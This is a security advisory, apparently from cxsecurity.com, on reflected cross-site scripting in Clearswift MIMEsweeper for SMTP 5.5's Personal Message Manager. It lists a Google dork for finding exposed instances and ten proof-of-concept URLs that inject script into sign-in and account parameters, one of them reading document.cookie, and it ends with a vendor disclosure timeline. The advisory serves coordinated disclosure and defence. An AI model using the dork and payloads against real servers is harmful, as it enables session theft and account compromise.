MIMEsweeper For SMTP 5.5 Cross Site Scripting

2013.02.19
Credit: Anastasios Monachos
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:/MSWPMM/

Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM) Vendor: Clearswift Ltd Vendor URL: http://www.clearswift.com/ Category: Reflective XSS Google dork: inurl:/MSWPMM/ Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com] [Vulnerability Reproduction] 1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script> 2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script> 3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script> 4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script> 5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script> 6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script> 9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx 10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script> [Time-line] 17/07/2009 - Initial discovery 13/01/2012 - Notified vendor 13/01/2012 - Vendor responded 16/01/2012 - Vendor requested more information 16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate 16/01/2012 - Informed vendor for evaluation progress, v5.5.0 is vulnerable too 17/01/2012 - Telephone conversation with vendor in regards the findings 17/01/2012 - Assigned vulnerability reference MSW-1459 25/01/2012 - Requested status update 25/01/2012 - Vendor replied "There is no update on MSW-1459." 16/02/2012 - Requested status update 26/02/2012 - Vendor replied "There is no update on MSW-1459." 23/03/2012 - Requested status update 23/03/2012 - Vendor replied "There is no update on MSW-1459." 09/05/2012 - Requested status update and gave a notice for public disclosure 11/05/2012 - Vendor replied "There is no update on MSW-1459." 18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team 07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release 07/06/2012 - Requested due to date for next release 12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012 13/06/2012 - We suggested to postpone the disclosure after the patch be public 06/12/2012 - Requested status update 06/12/2012 - Vendor sent details for patch 28/01/2013 - Patch is applicable for 5.5.1 09/02/2012 - We requested for demo license to verify fix 15/02/2013 - Vendor could not produce demo license for us to verify the fix 15/02/2013 - Vendor closes incident ticket 18/02/2013 - Public disclosure date

References:

http://www.clearswift.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top